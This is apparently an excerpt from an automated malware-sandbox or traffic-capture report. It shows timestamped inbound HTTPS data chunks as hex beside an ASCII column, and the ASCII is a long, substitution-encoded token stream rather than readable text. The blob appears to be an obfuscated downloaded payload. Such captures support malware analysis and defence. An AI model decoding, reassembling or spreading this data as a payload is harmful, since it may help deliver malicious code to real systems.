                                                                                                2021-10-26 15:35:12 UTC2686INData Raw: 53 20 54 53 4f 20 53 20 54 53 50 20 53 20 4f 55 20 53 20 55 6e 20 53 20 54 54 50 20 53 20 69 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 69 20 53 20 6e 50 20 53 20 6e 4f 20 53 20 55 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 4f 6e 20 53 20 54 4d 4d 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 50 69 20 53 20 6e 54 20 53 20 70 50 20 53 20 54 54 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 55 20 53 20 55 70 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 6e 20 53 20 6e 67 20 53 20 50 53 20 53 20 6e 53 20 53 20 54 54 55 20 53 20 55 53 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 53 20 53 20 54 53 50 20 53 20 54 53 6e 20
                                                                                                Data Ascii: S TSO S TSP S OU S Un S TTP S ig S in S in S in S Pi S nP S nO S Up S pP S pP S pn S nU S TSi S On S TMM S PP S in S in S Pn S UT S Pi S nT S pP S TTn S pP S pP S pp S UU S Up S TTU S Pn S iO S pn S ng S PS S nS S TTU S US S PT S in S in S PS S TSP S TSn
                                                                                                2021-10-26 15:35:12 UTC2687INData Raw: 53 20 54 54 70 20 53 20 54 54 54 20 53 20 69 55 20 53 20 6e 6e 20 53 20 54 53 69 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 54 54 4f 20 53 20 6e 6e 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 6e 20 53 20 54 53 4d 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 70 50 20 53 20 54 53 70 20 53 20 54 54 54 20 53 20 54 54 4d 20 53 20 54 53 70 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 54 53 4d 20 53 20 54 54 4f 20 53 20 54 53 67 20 53 20 55 54 20 53 20 70 50 20 53 20 55 50 20 53 20 55 4f 20 53 20 6e 4f 20 53 20 69 6e 20 53 20 54 54 67 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 55 20 53 20 55 6e 20 53 20 55 70 20 53 20 50 54
                                                                                                Data Ascii: S TTp S TTT S iU S nn S TSi S pP S pP S nO S TSP S TTO S nn S TTO S pP S pP S Un S TSM S Pn S iU S ni S pP S TSp S TTT S TTM S TSp S nn S pP S pP S nS S TSU S TSM S TTO S TSg S UT S pP S UP S UO S nO S in S TTg S pO S UT S pP S pP S pP S nU S Un S Up S PT
                                                                                                2021-10-26 15:35:12 UTC2689INData Raw: 20 53 20 6e 54 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 54 53 4d 20 53 20 54 54 54 20 53 20 50 69 20 53 20 6e 4d 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 55 53 20 53 20 70 50 20 53 20 55 55 20 53 20 69 4f 20 53 20 50 67 20 53 20 4f 55 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 6e 55 20 53 20 55 70 20 53 20 54 53 50 20 53 20 69 67 20 53 20 54 4d 54 20 53 20 70 55 20 53 20 50 50 20 53 20 70 4f 20 53 20 70 70 20 53 20 55 69 20 53 20 55 70 20 53 20 54 53 55 20 53 20 54 53 54 20 53 20 6e 55 20 53 20 55 4d 20 53 20 4f 4f 20 53 20 55 69 20 53 20 54 54 54 20 53 20 54 54 54 20 53 20 55 55 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 50 50 20 53 20 55 55 20 53 20 4f 4f 20 53 20 70
                                                                                                Data Ascii: S nT S Pi S TTO S TSM S TTT S Pi S nM S OO S pP S pP S pU S US S pP S UU S iO S Pg S OU S TMT S OO S nU S Up S TSP S ig S TMT S pU S PP S pO S pp S Ui S Up S TSU S TST S nU S UM S OO S Ui S TTT S TTT S UU S OO S pP S pP S nS S pU S TTT S PP S UU S OO S p
                                                                                                2021-10-26 15:35:12 UTC2690INData Raw: 20 53 20 54 4d 53 20 53 20 55 54 20 53 20 4f 6e 20 53 20 54 53 67 20 53 20 6e 53 20 53 20 54 54 67 20 53 20 70 50 20 53 20 54 53 55 20 53 20 6e 55 20 53 20 55 55 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 67 20 53 20 69 6e 20 53 20 50 6e 20 53 20 4f 55 20 53 20 54 54 69 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 53 20 53 20 70 50 20 53 20 6e 4f 20 53 20 50 70 20 53 20 6e 55 20 53 20 69 55 20 53 20 70 55 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 6e 53 20 53 20 69 6e 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 6e 55 20 53 20 70 4f 20 53 20 6e 67 20 53 20 54 53 6e 20 53 20 70 70 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 55 53 20 53 20 54 54 69 20 53 20 70 6e 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 54 67 20 53 20 6e 6e 20 53 20
                                                                                                Data Ascii: S TMS S UT S On S TSg S nS S TTg S pP S TSU S nU S UU S in S PT S UP S ng S in S Pn S OU S TTi S pP S TSp S US S pP S nO S Pp S nU S iU S pU S ng S TTp S nS S in S ng S TTp S nU S pO S ng S TSn S pp S TSP S in S US S TTi S pn S US S Pp S Up S TTg S nn S
                                                                                                2021-10-26 15:35:12 UTC2691INData Raw: 70 20 53 20 55 50 20 53 20 55 54 20 53 20 70 55 20 53 20 70 50 20 53 20 55 69 20 53 20 69 55 20 53 20 70 4f 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 55 20 53 20 6e 6e 20 53 20 55 55 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 55 20 53 20 54 54 54 20 53 20 69 6e 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 70 20 53 20 54 53 55 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 53 20 53 20 54 53 70 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 54 20 53 20 55 70 20 53 20 54 4d 54 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 4f 53 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 54 53 53 20 53 20 54 53 4f 20 53 20 54 53
                                                                                                Data Ascii: p S UP S UT S pU S pP S Ui S iU S pO S pP S UT S pP S pP S Un S UU S nn S UU S TSp S UO S UU S TTT S in S TSM S in S in S Up S TSU S pn S nU S TSi S TSS S TSp S PP S in S in S in S TTT S Up S TMT S TTO S pP S pP S nS S TSU S OS S Pi S TTO S TSS S TSO S TS
                                                                                                2021-10-26 15:35:12 UTC2693INData Raw: 53 20 69 55 20 53 20 55 53 20 53 20 54 54 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 70 20 53 20 55 6e 20 53 20 54 53 6e 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 55 20 53 20 54 53 67 20 53 20 69 6e 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 6e 6e 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 54 4d 4d 20 53 20 6e 50 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 4d 53 20 53 20 54 54 4f 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 54 53 69 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 69 4f 20 53 20 54 53 6e 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50
                                                                                                Data Ascii: S iU S US S TTU S in S in S ig S TSp S Un S TSn S UT S pP S pP S TSp S UO S UU S TSg S in S TSM S in S in S TSg S Pp S UT S nn S UP S nO S TSp S TMM S nP S TTO S pP S pP S TMS S TTO S UT S TSn S iO S nn S TSi S pP S pP S nO S TSP S iO S TSn S UT S pP S pP
                                                                                                2021-10-26 15:35:12 UTC2694INData Raw: 55 54 20 53 20 54 53 55 20 53 20 69 4f 20 53 20 4f 6e 20 53 20 54 53 67 20 53 20 55 6e 20 53 20 50 53 20 53 20 55 4d 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 6e 67 20 53 20 6e 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 50 70 20 53 20 6e 6e 20 53 20 55 53 20 53 20 54 53 69 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 55 69 20 53 20 54 53 4d 20 53 20 54 4d 53 20 53 20 55 4d 20 53 20 55 50 20 53 20 6e 53 20 53 20 4f 6e 20 53 20 6e 69 20 53 20 55 55 20 53 20 54 53 4d 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 6e 50 20 53 20 69 6e 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 4d 4d 20 53
                                                                                                Data Ascii: UT S TSU S iO S On S TSg S Un S PS S UM S TSg S pP S pP S UP S nO S TSP S ng S nO S pP S pP S pP S nO S Pp S nn S US S TSi S nn S pP S pp S pP S pP S pn S nU S Ui S TSM S TMS S UM S UP S nS S On S ni S UU S TSM S TMM S TTT S nP S in S PT S in S in S TMM S
                                                                                                2021-10-26 15:35:12 UTC2695INData Raw: 20 53 20 55 50 20 53 20 55 4f 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 55 50 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 6e 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 67 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 55 20 53 20 50 70 20 53 20 50 69 20 53 20 70 70 20 53 20 54 54 4f 20 53 20 6e 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 53 20 53 20 54 54 4f 20 53 20 6e 4d 20 53 20 55 50 20 53 20 6e 69 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 6e 20 53 20 54 54 54 20 53 20 54 54 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 55 50 20 53 20 55 55 20 53 20 50 4d 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 55 20 53 20 50
                                                                                                Data Ascii: S UP S UO S in S PT S UP S UP S in S PT S UP S UT S in S PT S UP S nn S in S PT S UP S ng S in S PT S UU S Pp S Pi S pp S TTO S nM S pP S pP S pn S nS S TTO S nM S UP S ni S in S TMS S Un S TTT S TTO S pO S pP S pP S TSP S UP S UU S PM S in S PT S UU S P
                                                                                                2021-10-26 15:35:12 UTC2697INData Raw: 20 50 6e 20 53 20 69 4f 20 53 20 6e 53 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 55 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 6e 20 53 20 6e 54 20 53 20 54 54 54 20 53 20 70 70 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 55 20 53 20 50 70 20 53 20 55 70 20 53 20 69 6e 20 53 20 50 6e 20 53 20 69 4f 20 53 20 50 6e 20 53 20 55 53 20 53 20 69 6e 20 53 20 55 6e 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 6e 67 20 53 20 54 4d 4d 20 53 20 54 54 4f 20 53 20 70 55 20 53 20 54 54 55 20 53 20 70 55 20 53 20 50 69 20 53 20 54 4d 54 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 67 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 4d 20 53 20 54 4d 4d 20 53 20
                                                                                                Data Ascii: Pn S iO S nS S US S Pn S iO S pO S US S Pn S iO S pU S US S Pn S iO S pn S nT S TTT S pp S in S PT S UU S Pp S Up S in S Pn S iO S Pn S US S in S Un S Pi S TTO S ng S TMM S TTO S pU S TTU S pU S Pi S TMT S pU S in S TSS S Ug S pU S in S TSS S UM S TMM S
                                                                                                2021-10-26 15:35:12 UTC2698INData Raw: 20 6e 6e 20 53 20 55 70 20 53 20 54 54 54 20 53 20 50 53 20 53 20 6e 53 20 53 20 50 70 20 53 20 54 54 55 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 4f 20 53 20 6e 55 20 53 20 55 54 20 53 20 4f 53 20 53 20 54 54 54 20 53 20 54 53 4f 20 53 20 54 53 53 20 53 20 50 70 20 53 20 55 53 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 50 20 53 20 69 4f 20 53 20 54 53 70 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 6e 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 6e 6e 20 53 20 55 70 20 53 20 54 54 69 20 53 20 54 53 67 20 53 20 70 4f 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 4f 55 20 53 20 50 54 20 53
                                                                                                Data Ascii: nn S Up S TTT S PS S nS S Pp S TTU S TMM S in S in S iO S nU S UT S OS S TTT S TSO S TSS S Pp S US S TMM S in S in S ig S TSP S iO S TSp S TSg S pP S pP S TSP S PT S UP S nn S TSg S Pp S UT S nn S Up S TTi S TSg S pO S pP S UT S pP S pP S TSp S OU S PT S
                                                                                                2021-10-26 15:35:12 UTC2699INData Raw: 20 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 54 53 50 20 53 20 50 70 20 53 20 54 53 54 20 53 20 6e 55 20 53 20 54 54 55 20 53 20 54 53 4d 20 53 20 70 55 20 53 20 50 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 54 20 53 20 70 6e 20 53 20 54 53 50 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 4f 20 53 20 6e 55 20 53 20 54 54 55 20 53 20 54 53 67 20 53 20 54 4d 53 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 54 53 4f 20 53 20 6e 4f 20 53 20 55 4d 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 54 53 4f 20 53 20 54 54 54 20 53 20 54 53 55 20 53 20 55 70 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 50 6e 20 53 20 50 70 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 55 50 20 53 20 54 53 70
                                                                                                Data Ascii: in S Pn S UT S TSP S Pp S TST S nU S TTU S TSM S pU S Pp S in S in S in S TTT S pn S TSP S UP S pP S pP S nS S TSO S nU S TTU S TSg S TMS S pn S pP S pP S pp S TSO S nO S UM S Pn S iU S ni S TSO S TTT S TSU S Up S PM S TSU S Pn S Pp S nO S TSp S UP S TSp
                                                                                                2021-10-26 15:35:12 UTC2701INData Raw: 20 53 20 6e 69 20 53 20 55 55 20 53 20 55 4f 20 53 20 54 53 70 20 53 20 54 54 54 20 53 20 6e 4f 20 53 20 54 54 54 20 53 20 69 55 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 55 53 20 53 20 70 4f 20 53 20 70 55 20 53 20 6e 53 20 53 20 54 53 54 20 53 20 6e 55 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 54 4d 53 20 53 20 55 54 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 4f 6e 20 53 20 54 53 69 20 53 20 50 6e 20 53 20 55 54 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 4f 20 53 20 54 53 6e 20 53 20 55 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 55 70 20 53 20 50 54 20 53 20 50 70 20 53 20 50 69 20 53 20 55 53 20 53 20 50 4d 20 53 20 54
                                                                                                Data Ascii: S ni S UU S UO S TSp S TTT S nO S TTT S iU S pP S pP S ng S US S pO S pU S nS S TST S nU S UM S TSM S TMS S UT S TSp S UO S UP S pP S in S in S in S in S On S TSi S Pn S UT S TSp S UO S UO S TSn S UM S pP S pP S pP S TSP S Up S PT S Pp S Pi S US S PM S T
                                                                                                2021-10-26 15:35:12 UTC2702INData Raw: 20 53 20 54 53 69 20 53 20 4f 55 20 53 20 6e 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 55 70 20 53 20 50 4d 20 53 20 69 4f 20 53 20 6e 53 20 53 20 69 6e 20 53 20 6e 53 20 53 20 70 6e 20 53 20 6e 55 20 53 20 55 4d 20 53 20 55 4f 20 53 20 54 53 69 20 53 20 54 54 67 20 53 20 6e 4d 20 53 20 69 4f 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 4f 20 53 20 54 53 69 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 54 20 53 20 55 4d 20 53 20 55 67 20 53 20 69 55 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 6e 4f 20 53 20 6e 55 20 53 20 4f 55 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 4f 20 53 20 6e 50 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 55 54 20 53 20 70 55 20
                                                                                                Data Ascii: S TSi S OU S np S UT S pP S pP S Up S PM S iO S nS S in S nS S pn S nU S UM S UO S TSi S TTg S nM S iO S pn S nU S TSi S TSO S TSi S pO S pP S pP S pU S TTT S UM S Ug S iU S pP S pP S ng S nO S nU S OU S US S in S in S in S TTO S nP S nU S TSi S UT S pU
                                                                                                2021-10-26 15:35:12 UTC2703INData Raw: 20 53 20 70 70 20 53 20 55 67 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 54 20 53 20 54 4d 54 20 53 20 6e 70 20 53 20 54 53 69 20 53 20 54 53 69 20 53 20 54 53 69 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 55 20 53 20 69 67 20 53 20 70 6e 20 53 20 70 70 20 53 20 69 55 20 53 20 70 50 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 6e 53 20 53 20 69 67 20 53 20 6e 67 20 53 20 6e 4f 20 53 20 69 67 20 53 20 54 54 67 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 50 20 53 20 6e 70 20 53 20 54 53 4d 20 53 20 55 54 20 53 20 54 53 69 20 53 20 69 4f 20 53 20 70 55 20 53 20 6e 54 20 53 20 54 53 50 20 53 20 70 4f 20 53 20 54 4d 54 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20
                                                                                                Data Ascii: S pp S Ug S ni S UM S TST S TMT S np S TSi S TSi S TSi S pO S pP S pP S pn S pU S ig S pn S pp S iU S pP S PM S TSU S nS S ig S ng S nO S ig S TTg S pO S UT S pP S pP S pP S nP S np S TSM S UT S TSi S iO S pU S nT S TSP S pO S TMT S UP S pP S pP S TSP S
                                                                                                2021-10-26 15:35:12 UTC2705INData Raw: 6e 55 20 53 20 54 53 69 20 53 20 54 54 6e 20 53 20 70 70 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 4d 53 20 53 20 54 4d 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 69 4f 20 53 20 6e 55 20 53 20 54 54 67 20 53 20 6e 53 20 53 20 6e 4d 20 53 20 54 54 54 20 53 20 6e 70 20 53 20 54 54 6e 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 53 20 53 20 55 4f 20 53 20 50 67 20 53 20 6e 4d 20 53 20 50 54 20 53 20 55 54 20 53 20 6e 50 20 53 20 55 70 20 53 20 50 4d 20 53 20 69 4f 20 53 20 6e 53 20 53 20 54 54 67 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 54 69 20 53 20 6e 4f 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 4d 20 53 20 69 4f 20 53 20 6e 53 20
                                                                                                Data Ascii: nU S TSi S TTn S pp S UP S pP S pP S pU S TTT S TMS S TMT S PM S pP S pP S ng S iO S nU S TTg S nS S nM S TTT S np S TTn S TMM S in S in S PS S UO S Pg S nM S PT S UT S nP S Up S PM S iO S nS S TTg S nS S pU S TTT S TTi S nO S PT S in S in S PM S iO S nS
                                                                                                2021-10-26 15:35:12 UTC2706INData Raw: 20 53 20 6e 6e 20 53 20 55 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4d 20 53 20 55 54 20 53 20 70 55 20 53 20 54 53 50 20 53 20 55 50 20 53 20 55 55 20 53 20 69 55 20 53 20 54 53 67 20 53 20 55 50 20 53 20 50 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 69 4f 20 53 20 6e 67 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 70 20 53 20 70 50 20 53 20 6e 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 55 20 53 20 55 6e 20 53 20 54 54 54 20 53 20 50 69 20 53 20 6e 70 20 53 20 54 53 67 20 53 20 54 54 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 4d 4d 20 53 20 50 53 20 53 20 50 4d 20 53
                                                                                                Data Ascii: S nn S UM S pP S pP S nM S UT S pU S TSP S UP S UU S iU S TSg S UP S PT S PM S pP S pP S UT S pP S pP S ng S PS S iO S ng S US S in S in S in S ig S TSp S pP S np S pP S pP S pP S TSp S UU S Un S TTT S Pi S np S TSg S TTP S pP S pP S pP S TMM S PS S PM S
                                                                                                2021-10-26 15:35:12 UTC2707INData Raw: 69 4f 20 53 20 55 4d 20 53 20 69 4f 20 53 20 54 53 53 20 53 20 54 54 54 20 53 20 55 69 20 53 20 6e 6e 20 53 20 54 54 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 69 55 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 50 20 53 20 50 6e 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 53 69 20 53 20 54 54 54 20 53 20 54 4d 54 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 6e 67 20 53 20 54 53 55 20 53 20 6e 54 20 53 20 70 4f 20 53 20 55 53 20 53 20 69 6e 20 53 20 55 55 20 53 20 4f 6e 20 53 20 6e 67 20 53 20 70 55 20 53 20 6e 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54
                                                                                                Data Ascii: iO S UM S iO S TSS S TTT S Ui S nn S TTM S pP S pP S US S Pp S Up S iU S nn S pp S pP S pP S ng S TTP S Pn S iO S nn S pp S pP S pP S nT S TSi S TTT S TMT S TSn S pP S pP S UP S ng S TSU S nT S pO S US S in S UU S On S ng S pU S nP S UT S pP S pU S in S T
                                                                                                2021-10-26 15:35:12 UTC2709INData Raw: 6e 67 20 53 20 55 53 20 53 20 70 4f 20 53 20 70 55 20 53 20 6e 4f 20 53 20 54 54 50 20 53 20 6e 4f 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 70 6e 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 53 70 20 53 20 54 53 69 20 53 20 50 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 4f 53 20 53 20 54 53 50 20 53 20 55 54 20 53 20 4f 55 20 53 20 70 6e 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 70 6e 20 53 20 55 54 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 70 70 20 53 20 70 55 20 53 20 69 6e 20 53 20 4f 4f 20 53 20 70 70 20 53 20 70
                                                                                                Data Ascii: ng S US S pO S pU S nO S TTP S nO S in S PT S UT S TSn S pn S nS S pU S TTT S TSp S TSi S Pp S pP S pP S nS S TSU S OS S TSP S UT S OU S pn S pn S pP S pU S in S TSS S pn S UT S UT S in S PT S UT S TSn S pO S US S Pn S iU S ni S pp S pU S in S OO S pp S p
                                                                                                2021-10-26 15:35:12 UTC2710INData Raw: 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 55 50 20 53 20 50 69 20 53 20 69 4f 20 53 20 6e 69 20 53 20 55 69 20 53 20 55 70 20 53 20 54 54 69 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 69 67 20 53 20 54 53 50 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 50 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 4d 54 20 53 20 6e 6e 20 53 20 6e 53 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 54 54 4f 20 53 20 54 53 69 20 53 20 54 53 4d 20 53 20 4f 53 20 53 20 69 67 20 53 20 6e 69 20 53 20 54 54 54 20 53 20 54 54 70 20 53 20 6e 53 20 53 20 70 55 20 53 20 6e 67 20 53 20 69 4f 20 53 20 55 6e 20 53 20 70
                                                                                                Data Ascii: S TSg S Pp S UT S UP S Pi S iO S ni S Ui S Up S TTi S TTU S Pn S pP S TTO S pP S pP S UP S ig S TSP S PT S in S in S in S in S UP S US S Pp S Up S TMT S nn S nS S pP S pP S ng S TTU S TTO S TSi S TSM S OS S ig S ni S TTT S TTp S nS S pU S ng S iO S Un S p
                                                                                                2021-10-26 15:35:12 UTC2711INData Raw: 20 54 4d 4d 20 53 20 54 54 55 20 53 20 50 54 20 53 20 54 53 53 20 53 20 6e 4d 20 53 20 54 54 67 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 53 67 20 53 20 54 53 50 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 53 54 20 53 20 55 67 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 53 4d 20 53 20 54 4d 54 20 53 20 6e 70 20 53 20 70 70 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 69 4f 20 53 20 6e 53 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 55 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 6e 4f 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 70 6e 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 54 20 53 20 55 67 20 53 20 70 55 20 53 20 55 69 20 53 20 54 53 4d 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 50
                                                                                                Data Ascii: TMM S TTU S PT S TSS S nM S TTg S ni S TSM S TSg S TSP S ni S TSM S TST S Ug S ni S TSM S TSM S TMT S np S pp S TTU S Pn S iO S nS S US S Pn S iO S pO S US S Pn S iO S pU S ng S TTU S nO S in S TMS S pn S ni S UM S TST S Ug S pU S Ui S TSM S TMM S in S P
